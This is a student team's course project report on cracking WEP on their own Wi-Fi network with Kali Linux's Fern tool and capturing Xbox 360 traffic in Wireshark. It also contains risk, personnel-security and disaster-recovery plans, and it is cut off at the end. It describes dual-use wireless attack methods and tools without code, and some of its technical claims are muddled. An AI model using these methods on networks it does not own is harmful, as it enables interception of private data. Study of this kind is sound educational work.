Blake Michener, Bryan Beech, Eric Gibbs, Hunter Walker, Matt DeRosa, Kevin Foldes TEAM CLOCKWORK SRA 221 PROJECT
Blake Michener, Bryan Beech, Eric Gibbs, Hunter Walker, Matt DeRosa, Kevin Foldes
TEAM CLOCKWORK SRA 221 PROJECT
P a g e | 1
Table of Contents
Executive Summary 2
Memorandum of Understanding 3
Requirements Documentation 6
Risk Assessment and Mitigation Plan 11
Proposal 15
Detailed Security Plan 16
Technical Implementation 35
Appendix of Detailed Setup Instructions 37
Appendix of Problems 39
P a g e | 2
Executive Summary Problem
Team Clockwork sought to crack WEP wireless encryption, capture Microsoft Xbox 360
packets streaming over the network, and analyze them through the Wireshark software.
Solution
After the team encountered initial setbacks with Backtrack 5 and the first round of Kali
Linux attempts, team members were able to successfully isolate Xbox traffic utilizing the Fern
Wi-Fi Cracker software. The successful capture was performed by bridging the attacking laptop
and the Xbox 360 console, isolating the network traffic, initiating a chop chop attack on the
wireless encryption, and recording the results in Wireshark. Ultimately, a number of different
packets and handshakes were recording, ranging from basic network traffic to encrypted
handshakes for services like Netflix and finally Xbox Live account handshakes. As further
detailed in the Technical Implementation document and the presentation, Team Clockwork’s
solution to cracking WEP wireless encryption on the Xbox is the best fit for the problem because
it is easy to follow, repeatable, reliable, and evolved out of the real world challenges and
successes that occurred during this term project.
Team Clockwork Members
Blake Michener (bdm5125)
Eric Gibbs (emg5361)
Hunter Walker (hzw5097)
Bryan Beech (bwb5287)
Kevin Foldes (krf5170)
Matt DeRosa (mmd5271)
P a g e | 3
Memorandum of Understanding
The purpose of our project is to break into an encrypted wireless network that has been
setup by us for this purpose. We will then leverage the cracked network to intercept data that is
being streamed from a wireless router via Wi-Fi to an Xbox gaming console. We are also
looking to gain experience with the use of the Kali Linux software tools, specifically Fern.
Throughout this project, we also want to obtain a greater understanding of the fundamentals of
wireless encryption and wireless fidelity in general.
The problem being addressed in our project will be the extent of vulnerability from a
connection between an encrypted wireless network to an Xbox gaming console. The focus of our
project will be the Xbox to router connection, and to what extent our tools and knowledge can
intercept and manipulate from this data connection. Research into the type of protocols used to
transfer data from and to the Xbox will be high priority in organizing a successful breach. If
successful, the information gained from gaining access to this secure connection will allow
Microsoft to mediate any flaws and exploits used to deter security breaches from outside threats.
Primary stakeholders for the Kali project included Microsoft, Xbox Game Developers,
Internet Service Providers, Router Manufacturers, End Users, Hackers, Kali developers and
members of Team ClockWork. Should this project successfully intercept user data from an Xbox
over a wireless network, this may reveal a crucial security flaw for all businesses involved,
whether they develop the gaming console, software for it, or simply provide the wireless
connection and infrastructure. Any of these corporate stakeholders may find the team’s
discoveries useful for their own intrusion testing and vulnerability assessment purposes,
potentially averting a costly breach in their customer’s confidentiality. Alternatively, if the team
encounters difficulty in intercepting the wireless data, it may confirm the confidentiality of their
P a g e | 4
systems and serve as a practical proof of their existing security measures. The users of the Xbox
console and wireless networks are also stakeholders, as the project may expose issues that
positively or negatively impact their experience utilizing a wireless-reliant Xbox or other device.
Similarly, those seeking to exploit these networks could find the project a boon or bane – it may
expose a flaw they’ve already been exploiting for nefarious purposes or confirm the existing
system possesses is sufficiently secure. Those responsible for coding the Kali Linux distribution
and tools utilized within the project may also be considered stakeholders. Any flaws exploited
through their code could either generate interest in their work or create an immense backlash
against it for enabling hackers to exploit the Xbox console’s vulnerabilities. Finally, the Team
ClockWork members are key stakeholders, as the project’s success will largely determine our
grade and enjoyment of the SRA 221 course.
The timeline of this project will consist of all team members coordinating and working
together in order to meet the deadlines assigned by the professor. In order for our group project
to run smoothly, a lot of research will need to be done in order for group members to fully
understand our topic. In about two weeks our group will be able to fully understand the inner
workings of the Kali tools especially focusing on Fern. After fully understanding how to
penetrate networks, we will be able to research the wireless network capabilities for Microsoft’s
Xbox which should take about one week. This step should not be too difficult due to the fact that
an Xbox’s MAC and IP addresses can be found right on the system. The type of protocols that
are used to transfer data will also need to be researched which will allow our group to fully
understand how to crack a wireless network that is being streamed to an Xbox console. Team
Clockwork predicts that all members will have full knowledge with the task at hand in about a
month and a half. With the leadership from our team leader along with the determination of all
P a g e | 5
the team members, Team Clockwork will be able to fully understand the project topic and meet
the deadlines.
Measurements of success will be based upon our ability to gain access to the network the
Xbox and router are communicating on, intercept various packets being sent, and being able to
decrypt some of those packets to reveal user-sensitive data, such as logon information, credit
card details, or any other useful encrypted data. By revealing this data, we shall have exposed a
major flaw in security of Xbox consoles. This is important because millions of people store
credit card information on their systems and when they communicate with Xbox servers over the
internet, there is a possibility of personal information being leaked to unauthorized entities.
P a g e | 6
Requirements Documentation
Purpose and Explanation
Interfaces
Multiple interfaces will be needed to achieve our objective of breaching a WEP
encrypted Wi-Fi network. The most vital interface will be our virtual machine Linux interface.
This VM interface will allow us to access Kali Linux and other programs needed to break the
WEP encryption. Another essential interface will be the program Kali Linux which will allow us
to actually break the WEP encryption of our target network. The target interface of an Xbox 360
streaming data will used as well. We will configure a large transfer of data from an Xbox live
streaming service via our target Wi-Fi network which will be initiated on the Xbox. Another
interface will be the Linksys network configurator that will allow us to precisely adjust out
network’s security so that we can configure Kali Linux to counter it successfully
Functional Capabilities
In order for our project to be successful in capturing data from an Xbox 360 will we need
to have a few things functioning properly first. We will need to have a functioning Xbox 360
with online capabilities. We will also need a functioning virtual machine with Linux interface.
On this virtual machine with Linux we will need to have Kali Linux installed to break the WEP
encryption. With these things we will be able to use Fern program from Kali Linux on a virtual
linux system to intercept and crack wireless data sent to an Xbox 360.
Performance Levels
P a g e | 7
ClockWork expects to maintain a high performance level during the execution of our
mission. We have multiple laptop computers that will maintain the required processing power to
utilize Kali Linux so our project will remain consistent and not be interrupted. When our
computers utilize the Kali Linux program we expect it to comply with the security and quality
standards we have set for our project. If at any time the performance level decreases we will
reanalyze our structure and adjust accordingly to meet our specified criteria and performance
level.
Data Structures/Elements
As the scope of the project does not involve coding or the use any proprietary software, it
is unlikely that the team will be required to generate data structures or define elements. Interfaces
and software used during the course of the project will undoubtedly involve various forms of
self-contained elements and structures that the team may wish to familiarize themselves with, but
it is unlikely that knowledge of structures outside of basic arrays will be necessary, and only for
sorting data.
Safety
Team ClockWork’s motive is to intercept data that is being streamed from a wireless
router via Wi-Fi to an Xbox gaming console, with focusing mainly on streaming services such as
Netflix or Hulu. The aspect of safety for this project needs to be highly considered when
intercepting data. The main focus of our project may arise some issues concerning safety in
relation to Microsoft’s Terms of Use. Under the No Unlawful or Prohibited Use section of
Microsoft’s Terms of Use states that “Using a service in any fashion that could damage, disable,
or overload Microsoft’s network, or affecting another party’s service cannot be conducted.”
P a g e | 8
(Microsoft).
The aspect of safety for this project needs to be highly considered when intercepting data.
Since we will be trying to intercept data from an Xbox, there are certainly some risks involved.
We are not owners of the data, which may imply that we would be stealing this information. This
can be considered unlawful or prohibited, which may raise flags during parts of our project.
There are some Microsoft guidelines and rules by which we need to abide by in order to make
sure that we do not disown Microsoft’s Terms of Use.
In order to assure that the work we will be doing in our project abides by these terms, we
must be certain that we do not perform any procedures that would be damaging to the Microsoft
servers. In addition to this, we cannot do anything that would negatively affect Microsoft’s
servers or networks during the data interception steps.
Reliability
We need to ensure that we conduct our procedures in a way that is guaranteed to work
every single time it is attempted. When we write down the steps needed to conduct our mission
goal, we need to be clear and precise so that no future attempts to recreate the situation ever fail.
The instructions must be written in a legible manner as to not confuse any readers. We also have
to make sure our methods of capturing the target packets are correct in their proceedings,
enabling a user who follows these methods to produce a viable result every time. If we do not
verify our procedure multiple times we run the risk of losing our credibility in this project.
Some major points to consider about reliability is ensuring the connection to our virtual
machines. Our virtual machines is what allows us to capture packets being sent by the xbox
through the router. If access to this resource is interrupted during the procedure, we failed in
providing reliability for our project. The methods are required to work 100% of the time, if this
P a g e | 9
isn’t accomplished it would be a great pitfall for our project. Reliability is one of the most
important aspects of this project and our group will work with great regard for reliability.
Security/Privacy
Due to the sensitive nature of breaching WEP encryption and capturing data from an
Xbox console, Team ClockWork faces practical concerns relating to security and privacy. First,
since the team will be exploiting vulnerabilities within their own Wi-Fi connections and related
devices, they must be careful to avoid inadvertently exposing their own equipment and private
information to outside threats. Precautions should be taken to ensure that all major interfaces
utilized involved the project, such as Kali Linux and the network configurator, are themselves
secure before attempting to proceed. ClockWork must also outline precautions and guidelines
before commencing data capture to avoid accidentally violating the privacy of anyone within the
group. The team must work to ensure that Kali Linux and the associated tools are only being
used to monitor, capture data, and break encryption on team owned and operated devices, so as
not to interfere with the privacy and security of others. Failure to do so could incur serious legal
liabilities and threaten the project’s success and legitimacy. Finally, touching back to issues
raised in the Safety section, the team must be cautious to avoid any action that could be
construed as damaging towards Microsoft’s data and network systems, since doing so would
grievously impact the security and operations of the project.
Quality
In terms of quality for this project, we are expecting the data we intercept to be
significant. The type of data we are expecting to intercept data such as user information, which
will require filtering of any non-essential data that could be collected in the process. Valuable
P a g e | 10
information will be isolated from invaluable data and translated into an understandable format.
The information acquired is expected to be valuable enough to deem it a security risk and that be
able to state that valuable information is able to be acquired through said actions.
Constraints and Limitations
We will be constrained by our team’s lack of previous experience with network hacking
and a need to practice our approach and work around technical problems that are bound to arise.
The level of encryption is a limitation to us our goal as well seeing as the higher the encryption,
the more difficult it is to crack and the more expertise that is required. Certain encryptions could
exceed the amount of processing power and capability that is our cracking program, Kali Linux.
Even if Kali Linux is able to handle the encryption, the time it would take could be prohibitively
lengthy as well, leading to a need for another plan.
P a g e | 11
Risk Assessment & Mitigation Plan
What software and systems are present on the network?
Laptop computer
■ It could contain malware prior to use that can affect data and processes carried out at later time.
■ It could crash and ruin current operation.
■ It could have installed monitoring hardware and software like keystroke loggers and internet history
logger.
VMware server
■ Security could be comprised by a third party that has found a way in through the network and firewalls.
■ It could be comprised by an entity inside PSU with access to server room, direct uplink can bypass the
majority of the protocols.
■ Bot attacks could potentially crash the server via DDOS or use servers and terminals in a bot attack on
another network.
Kali Linux
■ The program could be corrupt hindering our hacking efforts by means of a virus or many other means.
Wireless Router
■ Used as means to transmit data around the network wirelessly and provide an internet connection.
■ Unless specifically targeted by malicious physical means or corrupting program, relatively immune to
failure aside from outphasing of wireless bandwidth and manufacturer’s planned obsolescence.
Xbox Console
■ Tethered to the wifi network and is the target of the hack we are going to perform.
■ Wireless security is strong- uses Kerberos
■ While capable of getting a virus, Microsoft keeps a degree separation between the Xbox and the pure,
unfiltered internet that you get on your laptop.
■ Virus penetration would most likely have to come through Microsoft Xbox Live’s servers to affect
consoles effectively.
■ Although they have improved dramatically in recent product iterations, Xboxes have a noticeably higher
hardware failure rate compared to other consoles and computers. So there is always a risk of it failing
permanently.
P a g e | 12
■ Malware introduction from a real world entity via the USB ports on the console are possible as well
albeit very unlikely.
What systems are vulnerable on the current network?
Why are they vulnerable?
■ The network is vulnerable because Microsoft uses a well-documented authentication system with their
Xbox gaming platform - “Kerberos” that uses AES encryption to fulfill a PKI environment.
■ We can compromise the authentication server and then impersonate any user
■ It is still vulnerable to password-guessing attacks
■ Also does not prevent denial-of-service attacks
What types of solutions are available to mitigate the risks?
Hardware or Software? What kind?
■ In order to assure that the Laptop computer we are using isn’t infected with Malware or Viruses we must
set up Anti-Virus and Anti-Malware software on the Laptop. By doing this we can run scans every time
we use the computer to ensure the computer’s in a good state at all times.
What’s the cost?
■ Since a group member of ours has Xfinity internet we have access to downloading the full Norton
Security Suite for free. In the free Security suite, you get everything you would by paying for the full
premier package. This package provides the following: “Core Protection”: Which is protection against
Viruses, spyware, trojan horses, worms, bots, and rootkits. It also protects against browser and application
threats, and protects you from infected websites. Another great protection feature it has is the networking
feature. Which helps secure and monitor your home network, it also automatically secures your PC when
connecting to public WiFi. It also has a ton of other features that won’t really utilize such as Identity
protection, PC tuneup and Support for these features.
What does it do?
P a g e | 13
■ Antivirus and Anti-Malware software utilizes signature based detection of malicious code for established
threats and heuristics to detect, prevent, and eliminate threats from newer forms of malware, trojans,
viruses, root kits, and tracking cookies. Signature based detection relies on updating a software catalog of
threat definitions distributed by the software’s developers containing known patterns of malicious code
and executables. The software scans the host system for any matches within the archived database to
prevent and eliminate threats in real time or at scheduled intervals. Suspicious code is isolated or deleted
upon detection and the system’s user is notified of the security breach. Heuristics relies on “rules of
thumb” to recognize similar patterns of coding and variations on established threats to prevent new
viruses or new variations of threats from affecting the host system. Just as with signature based detection,
the software will isolated or delete the threat upon detection, as well as notify the software developer of
the new threat.
How long will it take to implement?
■ It will not take very long to implement the Anti-Virus and Anti-Malware. Once we access Xfinity’s
website all we have to do is download the Security Suite and install it. This could take anywhere from 10-
15 minutes to a few hours depending on the size of the download and the internet speeds we are using.
Is implementation feasible?
■ Implementation and maintenance is easily feasible due to low to no cost, minimum time investment, and
the simple upkeep of the outlined plan. As mentioned, adequate protection is available through
complementary copies of the Norton Security Suite, which is a simple and intuitive software to use.
Group members will run the required scans to minimize the risk to all systems involved in the project and
maintain up-to-date threat catalogs. Since many of these steps are already common practice for group
members outside of the scope of the project, there are no expected difficulties in implementing the
mitigation plan. Running the Norton software will require limited system overhead, but this is not
anticipated to be a serious performance concern.
P a g e | 14
Will implementation disrupt current business operations?
■ Implementation will not disrupt the current business operations at a high level. Using Anti-Malware and
Anti-Virus software is an essential steps concerning the operations for our project. The only disruption
implementation will introduce is simply the time it will take to run virus scans. If the software detects
viruses this will cause a serious disruption in our operations, but it is better for a virus to be detected than
our group members not knowing about it.
P a g e | 15
Team Clockwork Proposal
Our team is planning on using the Fern program from Kali Linux on a virtual Linux
system to intercept and crack wireless data being sent to an Xbox 360 gaming console. We will
set up a large data transfer on a LAN from a streaming service such as Netflix or Hulu and while
streaming to the console, we will use Fern to crack the WEP encryption and access the data
being transmitted. We will document our decryption process with a camera to demonstrate our
success.
P a g e | 16
Detailed Security Plan
Technical Security Policy & Baseline
Technical Details and System Setup
The first technical security aspect of our system is the Wi-Fi network. It will be configured to
WEP encryption standards and made visible to all scans for Wi-Fi networks. The Xbox will be
tethered to the Wi-Fi via its built-in network configuration settings that will require the
denotation of WEP encryption and the entrance of the WEP key. The SSID of the Wi-Fi network
is called Grapes there is no subway mask and a standard gateway being used. Proxy server
setting will be left alone as well. Once the console is connected to the Wi-Fi, data transmission
will begin to happen between the Xbox live servers and the console. A large data packet will
downloaded on the Xbox via an application of our choosing like Netflix, Hulu or HBO.
Additionally we will have our attacking machine on the Wi-Fi as well. Kali Linux, our Wi-Fi
cracking program, will be booted from a thumb drive on the attacking machine and configured to
break into our network. Seeing as we are booting from a thumb drive, we decrease our
vulnerability of anything backfiring on the attacking machine’s actual system or data. Microsoft
servers use Kerberos as their ticket granting service to Xbox consoles querying their databases
for information. However, once the data is transmitted through the wireless router, it only
receives WEP encryption from the router itself. With this being the security of the data at this
point, it is very low at this point and fairly easy to obtain. The attacking machine will run
Symantec antivirus to reduce the risk of picking up anything from the internet.
System Baseline
P a g e | 17
The baseline of the system involves constant connectivity between the router and all devices
connected to it unless the connected devices are shut off or have their Wi-Fi connectivity turned
off. There is a constant stream of data to and from all of the connected devices to the router and
then the internet. Checking for emails, system updates, iMessages and application data all make
up parts of the transmitted data. The Xbox console in specific is off of the network most of the
time since it doesn’t get that much use and is therefore shut off. Data streaming patterns are
erratic and vary with usage, online play and entertainment downloads. This is why we will be
specifically streaming a large amount of data at the time of break-in to ensure that we intercept
some of the packets. Normal operation does not involve the use Kali Linux or an attacking
machine that is not on the Wi-Fi. All of the devices in the system do not normally interact with
one another let alone intercept each other’s data.
Personnel Security Plan
Due to the fact that our project topic is intercepting packets that are being sent over a
network connecting to a Microsoft Xbox, the members of our team need to be responsible
when performing the necessary tasks in order to be successful. Team Clockwork will be
using the Kali Linux software in order to intercept data packets. Kali Linux is made from the
creators of BackTrack and is using for penetration testing. This software offers many tools,
including data analysis software, which can possibly cause harm to others without our group
members even knowing. Since Kali Linux has the capability to negatively affect others,
Team Clockwork has set guidelines on how each member of the team should act while
working on the project.
P a g e | 18
The members of Team Clockwork have come to the agreement to only use Kali Linux solely
for project purposes. Each team member is to act in a responsible manner and to not take
advantage of other team members or members of the public while using this software. Like
stated before, Kali Linux is home to many tools that our team can use. In particular, Team
Clockwork anticipates to use the WireShark, AirSnort, and Reaver tools. These tools are solely
for intercepting data packets, decrypting WEP encryptions, and breaking Wi-Fi passwords.
Team Clockwork has agreed that no member of the team shall use these tools against the general
public, team members, classmates, and the Penn State community. These tools will only be used
for our project and on a member of the teams wireless or Ethernet network.
The main purpose for setting these guidelines is to maintain responsibility and trust
throughout our team. With the team members working responsibly will ensure our project to
run smoothly without any difficulties. Attached below is a contract our team has come up with
to ensure each member follows the guidelines for the personnel security plan:
Team Clockwork Personnel Security Contract
1. No member of the team shall use any of the tools available to cause harm to any
teammates or the public.
2. The tools used shall only be used for project purposes.
3. Documentation of every step using the Kali Linux software shall be saved.
4. Every member of the team shall be present when using the Kali Linux software.
5. Any team member that does not abide by these rules shall be reported to the professor.
P a g e | 19
Team Member’s Signatures
Bryan Beech Bryan Beech
Kevin Foldes Kevin Foldes
Eric Gibbs Eric Gibbs
Hunter Walker Hunter Walker
Blake Michener Blake Michener
Matt DeRosa Matt DeRosa
Team Clockwork’s Personnel Security Contract is very similar to an Acceptable use
Policy (AUP). This security contract emphasizes that each team member needs to act in an
appropriate manner or consequences will arise. In order to make sure each team member is
following the guidelines set, Team Clockwork has agreed to all be together when using the Kali
Linux software. The rules stated in the contract relate to an AUP by clearly stating the
guidelines, outlining the penalties of breaking the rules, and having a signature section before
using the software so all team members are familiar with the rules before using the programs on
Kali Linux.
Working with an International Safety Security Management team would be very
beneficial for our team. However, Team Clockwork is not an established business or corporation
and does not need high priority security measures for this project. Due to the fact that this is a
team project for a class, the Pennsylvania State University can serve as an ISSN. With Team
Clockwork following the guidelines set, especially the point of documenting our steps,
Pennsylvania State University will serve as an ISSN if any issues arise. Granted, Team
P a g e | 20
Clockwork does not anticipate using the software for any illegal or harming actions, just solely
for project purposes.
Team Clockwork’s personnel security plan’s guidelines also relate to the three main
points from the CIA triangle: confidentiality, integrity, and availability. Confidentiality relates
to the team members only using the software for project purposes. No team member should use
Kali Linux to crack other’s passwords or put anyone’s data privacy at risk. Integrity comes into
play when using only the tools for project purposes and all team members being present when
conducting the necessary steps. The signature section included ensures that each team member
can be trusted and will uphold their integrity. Availability is the last point in the CIA triangle but
is not as important as the prior two. The availability of the software is on one of the team
members personal computers. Since the contract states that every team member needs to be
present while working with the software, the software will always be available to the team while
working. If an issue arises, such as the software not working correctly, all members of the team
will be present to fix the issue.
Physical Security Plan
The system is going to be physically secured using a laptop computer and a flash drive.
The physical security of the system will secure due to the separation of the laptop computer
configured to use Kali Linux, and the flash drive that the Kali Linux system is installed on. The
laptop computer will remain in Hunter Walkers possession for the entirety of the project, only
shared with group members during set times designated to work on the project. The flash drive
with Kali Linux will be on his person at all times on his keychain until it is booted on the laptop
for use. Access to the machine will be limited to group members who have been given the login
P a g e | 21
credentials for the laptop. The flash drive will also have limited access to only those authorized
as it will also be password protected. If the flash drive at any time will be exchanged between the
team for extended periods of time, further security will be put in place. The drive would then be
encrypted with a 128 bit encryption paired with a kill switch program, after 3 unsuccessful
attempts to enter the correct credentials, the drive will be wiped and unusable.
Take home hardware will be accounted for personally by Hunter Walker. As stated above
the laptop will be in his possession for the entirety of the project, when it is not in his immediate
possession it will be located in his apartment which will be locked. At no point in time will the
laptop be in sole possession of anyone outside of team clockwork.
Change Management Plan
Hardware and Software Upgrade Plan
Hardware upgrades will be fulfilled on an as-needed basis. If the hardware running Kali
Linux isn’t able to brute-force the security protocols on the router we’re trying to penetrate in a
timely fashion, then we will cluster multiple PCs together in order to combine processing power.
This additional processing power will enable us to penetrate the target router in a reasonable
timeframe.
If any piece of the hardware is found to be functioning incorrectly, that piece of hardware
should be replaced with one in working-condition as soon as possible.
Software upgrades will be implemented as soon as they are publicly available. When they
are, they will be immediately downloaded and installed on the machine responsible for
intercepting packets on the target network. These software upgrades ensure we keep our system
running in the most efficient and mitigate the risk of failure due to some software-related issue.
P a g e | 22
Performing Maintenance
Maintenance will be performed by the member with the most expertise of the system,
hardware, or software with regards to what type of maintenance task is being performed. For
example, if Kali Linux needs to be upgraded to the latest version, the member of the group with
the most expertise dealing with Kali Linux should be the member designated to upgrade the
operating system.
Credentials
Formal credentials are not required for this project, however, any member intending on
making changes to any part of the system should possess a working knowledge of the that piece
of equipment, as well as knowledge of how the system works as whole. This is so that the
member making changes won’t make changes that cause the system to function incorrectly.
Credential Assignment
Only members within the project group will be allowed to make changes to the system.
Authorized access is a priority because we need to be sure that the system stays within working
order.
Patch Management
Patch management coincides with our software upgrade policy. Patches should be rolled
out as soon as they are available. This policy includes monitoring update streams of the software
we are using such as Kali Linux, Wireshark, Airsnort, and Reaver tools. Patch checks should be
P a g e | 23
performed on a daily basis. This will ensure that functionality in our system stays in working
order.
Privilege Management Plan
Maintaining Integrity
Privilege management will be very easy on our system. We will be using Hunter’s
computer to run Kali Linux. Kali Linux is basically the new backtrack 5 on steroids, so we have
opted to use that. Everyone will be able to access this program from hunter’s computer locally
while working on the project together.
The physical security of the system will secure due to the separation of the laptop
computer configured to use Kali Linux, and the flash drive that the Kali Linux system is installed
on. The laptop computer will remain in Hunter Walkers possession for the entirety of the project,
only shared with group members during set times designated. The flash drive with Kali Linux
will be on Hunter at all times on his keychain. The flash drive will also have limited access to
only those authorized as it will also be password protected. The drive would then be encrypted
with a 128 bit encryption paired with a kill switch program, after 3 unsuccessful attempts to enter
the correct credentials, the drive will be wiped and unusable.
Access Policies
All group members will have access to the computer locally when working on the project
with Hunter. By doing this we allow everyone to try out Kali Linux and work on the project
together and learn how to use the program. By restricting certain group members we will only
P a g e | 24
hinder their learning of the new program and understanding of the process of cracking the WEP
and getting the information.
Executive Privilege
There will not be executive privileges and all group members will have the same
privileges as explained above. The only people who will “access” are those who are physically
there with Hunter when he runs Kali Linux off of his computer. Also since Hunter is the owner
and administrator of his computer he will be considered an executive because he has overall
power of the computer but we will be able to do anything needed to be done on his computer
with no restrictions.
Backup & Disaster Recovery Plan
Regional Threats
Crime
On campus and off campus, some of the most common crimes in the State College-
University Park area are larceny and burglary. Burglary is defined as illegal entry into a building
with the intent to commit other crimes, while larceny is the illegal act of taking another’s
personal property. In the 2012 calendar year, the Penn State Annual Security Report for 2013
listed a staggering four hundred and fifteen instances of larceny on campus alone, including three
automobiles. Another forty eight instances of burglary were also recorded on campus. In terms of
the greater State College area, burglary and larceny rates are generally regarded as low for the
population, although they tend to spike during periods of time where students are away from
P a g e | 25
their dorms or apartments. It is also worth noting that the University and town have separate
crime reporting under separate police departments, which may dramatically downplay the overall
rates and trends in minor crimes like larceny.
As a result of the somewhat substantial risk of theft for high value items like laptops,
computers, and Xbox consoles used within this project, team members should observe prudent
physical security measures and ensure their personal property is adequately secured at all time.
Theft of critical items could result in major delays related to the project’s timeline, important
data loss, and result in a lengthy recovery process. Team members who live off campus should
maintain a similar level of physical security as well as considering renter’s insurance to offset
some of the cost of potential larceny, if it is not already required by their lease. All team
members should maintain multiple copies of all important data as well as utilizing cloud storage
services to mitigate the risk of loss due to theft or other threats.
Severe Weather
Tornadoes
Tornadoes are a severe weather event characterized by a high speed, rotating column of
air. The high winds and damaging debris produced by tornadoes can destroy or damage
buildings, obliterate critical infrastructure, and constitute a serious threat to human life. While
Happy Valley may seem an unlikely place for such a disaster as it is located far from the
tornado-stricken region of the United States dubbed “Tornado Alley”, Pennsylvania still ranks
among the top twenty five states for tornado occurrences. This totals approximately twenty
damaging tornadoes per year, with Centre County experiencing approximately twelve tornado
events in the past one hundred and twenty nine years. While this rate of occurrence seems
P a g e | 26
extremely infrequent as it is on the low-middle side of the state’s tornado distribution, it is still a
dangerous event that could have a massive impact on critical project elements and recovery. The
damaging winds and relatively flat terrain of Centre County’s valleys could eviscerate utility
lines over a substantial area and result in a lengthy recovery period. Such outages of power and
internet would be devastating to the team’s project and deadlines.
The risks of tornadoes can best be addressed by team members monitoring current
weather and severe weather threats. Critical devices should be stored in safe and dry locations
under the threat of severe weather and unplugged if there is a risk of voltage spikes. Team
members should also be aware of the threat to their own safety and seek shelter in appropriate
buildings when under tornado watches or warnings. In the event of prolonged power or utility
outages, team members should, if possible, attempt to locate businesses or residences that were
not affected by the disaster and offer free internet connections to continue project development.
Thunderstorms
In the past fifty four years, Centre County has been host to far more damaging
thunderstorms than it has tornadoes. With one hundred and eighty nine being recorded in just the
past fifty four years, this averages out to approximately three and a half thunderstorms with
damaging winds, hail, lightning, and heavy rains per year. All of these phenomenon associated
with severe and even moderate storms pose a threat to our team’s equipment, data, and our
ability to perform critical tasks. Just as with tornadoes, the winds and hail can produce property
damage or sever power lines and utilities necessary for our operations. Lightning can also result
in damaging power surges that destroy or disable sensitive electronic devices. Finally, the heavy
rains associated with severe thunderstorms pose a threat to the unique geography of State
P a g e | 27
College – our area, especially campus, is incredibly prone to flooding. After heavy rain, major
roadways and low-lying buildings are vulnerable and flood waters pose a serious threat to
electronics and electricity.
The risks of thunderstorms can best be addressed similarly to tornadoes or other severe
weather by team members monitoring current weather threats. Critical devices should be stored
in safe and dry locations under the threat of severe weather and unplugged if there is a risk of
voltage spikes, as would occur with frequent lightning strikes in the nearby area. Team members
should also be aware of any threat to their own safety and seek shelter in appropriate buildings if
they are concerned about severe weather conditions. In the event of prolonged power or utility
outages, team members should, if possible, attempt to locate businesses or residences that were
not affected by the disaster and offer free internet connections to continue project development.
Flash Flooding
As mentioned above, Centre County and more specifically State College are at great risk
for serious flooding and water damage. While official records identify only twenty five flash
floods in the past fifty four years at a rate of about one flood every two years, this tally many
reflects rivers and major water sources overflowing as opposed to the more general water
dispersal problems that State College experiences. As recent as June of last year, heavy rains left
several feet of water pooled on some major roads and caused serious water damage to low lying
buildings. Floods could pose a serious threat to the project – flooding may physically destroy
essential devices and data, cut off utilities, pose a threat to the well-being of team members, and
require long term recovery based on extensive damages.
P a g e | 28
Flooding and flashing flooding risks can best be addressed similarly to other severe
weather. Team members should vigilantly monitor current weather threats and act accordingly.
Critical devices like computers or Xbox consoles should be stored in safe and dry locations that
are well above ground during the threat of flooding and unplugged to ensure that any damage to
surround utilities would not affect the device. Team members should also be aware of any threat
to their own safety and seek shelter in appropriate buildings if they are concerned about severe
weather conditions. Due to the difficulties associated with determining the depth or possible
damage cause by flood waters, team members are encouraged to avoid traveling during the
immediate emergency. In the event of prolonged power or utility outages, team members should,
if possible, attempt to locate businesses or residences that were not affected by the disaster and
offer free internet connections to continue project development.
Hurricanes
Pennsylvania and the Centre County region are at relatively low risk for the devastating
impact of full-force hurricanes, but the area has still been affected by the winds and substantial
rainfall that can occur when a tropical storm marches inland. Hurricanes have produced as much
as nineteen inches of rain water in eastern Pennsylvania and their high winds have been
associated with at least seven deaths in the past fifteen years. Due to their overall weakened
nature and most common attributes – high wind, substantial rainfall, and hail – team members
should generally regard tropical storms and hurricanes as powerful thunderstorms for a disaster
management perspective.
Hurricanes and their associated threats can best be addressed similarly to other severe
weather such as flooding or thunderstorms. Team members are expected to monitor current
P a g e | 29
weather threats and act accordingly. Critical devices like computers or Xbox consoles should be
stored in safe and dry locations that are well above ground during the threat of flooding and
unplugged to ensure that any damage to surround utilities would not affect the device, as might
happen with lightning from the storm front. Team members should also be aware of any threat to
their own safety and seek shelter in appropriate buildings if they are concerned about severe
weather conditions. In the event of prolonged power or utility outages, team members should, if
possible, attempt to locate businesses or residences that were not affected by the disaster and
offer free internet connections to continue project development.
Snow and Ice
The Centre County region experiences a substantial amount of severe winter weather
ranging from ice and sleet storms to powerful blizzards. The freezing precipitation can create
hazardous road conditions, down power lines, and create major schedule disruptions. Due to the
timeframe of the team’s project, however, the risk of these affecting our progress is remarkably
low. At present time, Accuweather suggests that there will be no freezing rain or snow within the
next several months.
In the event that snow does occur, team members should be cautious and allow extra time
for travel to classes or meetings. Snow poses little risk to the critical technology involved in the
project, though it could potentially lead to downed power lines or utilities. As with other threats,
in the event of prolonged power or utility outages, team members should, if possible, attempt to
locate businesses or residences that were not affected by the disaster and offer free internet
connections to continue project development. Campus computer labs are also generally
P a g e | 30
unaffected by frozen precipitation and may serve as a viable meeting place or alternative
workstation.
Earthquakes
Pennsylvania is not located along a major fault line and Centre County itself lies between
the very slight to slight risk categories for earthquake hazard zones. Although Penn State’s
University Park campus has experienced at least one felt tremor in the past five years, the
earthquake was not of substantial enough magnitude and was at great enough of a distance that it
did not pose any threat. More substantial earthquakes could cause significant destruction by
destroying underground and aboveground utilities, damaging or destroying buildings, and posing
a serious threat to team members.
In the event of a minor earthquake, team members are encouraged to avoid panicking and
move to a safe location. In the unlikely event of a major earthquake, team members should place
priority on personal safety and only focus on recovering key equipment after it is deemed safe by
proper authorities. As with other major disasters, it is likely that utilities may be disrupted for a
substantial period of time. If possible, team members should seek out businesses, known
residences, or campus workstations that have power and internet access.
Maintaining Uptime
As outlined in the potential threats and scenarios above, there are many commonalities in
maintaining reasonable uptime and recovering from serious disasters. First, key devices and
technology should be stored in a physically secure location that is locked or under direct
observation if it cannot be locked. Due to the overwhelming number of natural threats, this
P a g e | 31
location is ideally above ground, dry, and a stable location. Similar cautions should be utilized
when devices are in use for the team project, as should reasonable measures of physical security.
To ensure data and team progress is not lost, team members should adhere to the backup
plan outlined below, as well as ensuring all team related work is shared to group members, saved
to multiple physical locations(such as multiple hard drives, flash drives, personal and university
computers), and uploaded to the cloud storage service Google Drive. By following all of these
steps, the team can manage the catastrophic loss of one or more devices or copies of data without
actually losing progress on the project.
In the event of major utilities being down for an extended period of time, team members
should familiarize themselves with the many businesses and computer labs in the area that offer
free internet or computer access. The University Park campus itself is obviously a tremendous
resource, as it offers a central location that rarely loses power or internet access that could be
utilized for both team meetings and workstations in the event of a disaster. While they cannot be
used to compensate for equipment loss, many fast food restaurants and cafes offer free internet
